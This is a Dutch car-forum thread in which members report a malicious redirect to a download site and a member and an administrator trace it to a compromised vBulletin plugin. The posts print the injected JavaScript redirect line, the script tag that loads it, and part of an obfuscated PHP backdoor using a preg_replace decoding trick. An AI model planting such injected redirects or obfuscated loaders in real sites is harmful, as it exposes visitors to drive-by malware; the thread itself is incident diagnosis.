Ik krijg hem de laatste paar weken weer!
myfilestore.jpg
Super dat het opgelost is tevens heb ik een mail gestuurd eerder naar de webmaster en via contact formulier van deze inzake mijn oude account PaulusB die ik vanaf 2006 had zou Iemand deze mail kunnen oppakken? Dan kan dit account Paulusv6 weer verwijderd alvast dank
Ik krijg hem de laatste paar weken weer!
myfilestore.jpg
Op welke pagina krijg je dat?
Google geeft geen meldingen voor zover
https://www.google.com/transparencyr...w.audiforum.nl
Even wat gepield, hier een voor mij consistente reproductie (zowel in Chrome als Vivaldi, met of zonder adblocker):
- Cache legen
- Browser herstarten
- Naar www.audiforum.nl gaan en inloggen
- Navigeer naar: http://www.audiforum.nl/forum/audifo...ndrijving.html (geen probleem)
- Navigeer naar: https://t.co/xICXpiAndo (twitter shortlink naar bit.ly shortlink, die naar de URL hierboven verwijst)
Heb even wat sniffing gedaan en zie het volgende.
Zodra je via de t.co shortlink naar de site gaat, wordt op de pagina van het betreffende topic de file http://www.audiforum.nl/forum/misc.php?v=423&js=js aangeroepen. Dit levert een mini JS file op met onderstaand commando, wat inderdaad de redirect veroorzaakt:
Netwerk sniffing laat zien dat dit stukje van het AF IP af komt, dus lijkt toch echt een lek in VBulletin.Code:document.location='http://myfilestore.com/download.php?id=7ba7bd85'
In de "normale" situatie wordt het betreffende misc.php file überhaupt niet aangeroepen. Even gekeken waar die misc.php wordt ingeladen, en zo te zien wordt dit geinject in de <HEAD>, vlak onder de include van de vbulletin-core.js:
Het lijkt mij dat het niet normaal is dat die misc.php aan wordt geroepen met de "&js=js" parameter, dus dat zal ook iets te maken met de exploit.Code:<script type="text/javascript" src="http://www.audiforum.nl/forum/misc.php?v=423&js=js"></script>
Weer wat verder ge-googled:
http://www.vbulletin.com/forum/forum...curity-exploit
Lijkt dus (iig) een lek in YUI te zijn geweest, maar dat is van lang geleden. Ik kan niks recents vinden, dus wellicht dat er nog een plugin / component van vBulletin outdated is.
Deze thread geeft iig een hint voor een quickfix:
https://theadminzone.com/threads/tro...-forum.107913/
Als ik iets moet testen hoor ik het welCode:if($_GET['js']=='js') die;
thanks @ChronoworX!
Heb de hack gevonden;
$pt = \'b443e4a7f3c4e5fba3ab204301a6c617\';
$arrvb = hoop nare encrypted code;
$ajx = \'";<sJZ$nCa1X*re9,!.f|x)5:Iu^yPq4U}S#lvz8%Q>+W_b6 {M~/&-L2HkjKhd`GYgVptADFo=]?ciOwR([7@m0T3NEB\';
$ajx2 = \'4t#]qQGw[c"$^_hjFZN!{Sf/0P2;idzA:yV(g?1mK.C}Mao)7%rRu,k8b~HXD&n<|xJsL@+B*l 39-IY`vUe5EO>W6pT=\';
$baseline = \'%s%\'.substr($arrvb, 507, 1);
$gpu = preg_replace($baseline, strtr($arrvb, $ajx, $ajx2), \'vbseo\');
oude plugin die een vulnerability had. Zou nu goed opgeschoond moeten zijn.
http://club.myce.com/f20/vbulletin-m...e-them-332219/
Ik krijg ook een melding, alleen op deze pagina. Pas na disabelen van AVAST kan ik deze pagina openen.
avast.jpg
Audi A6 Avant 3.0 TFSI Quattro S-tronic Hartog Tuned Mijn voorsteltopic
Voorheen: 2011-2016 B7 Limo 2.0TFSI Quattro Tiptronic
Zo kreeg dit net ook ! zocht op google naar "muziek streamen audi mmi' en dan krijg je een paar hits van audiforum.nl Elektronica en Diagnose... en ik nam dan de kleinere hit eronder
http://www.google.nl/url?sa=t&rct=j&...774,bs.1,d.d24
Bam gelijk popups en weet ik veel wat een ellende !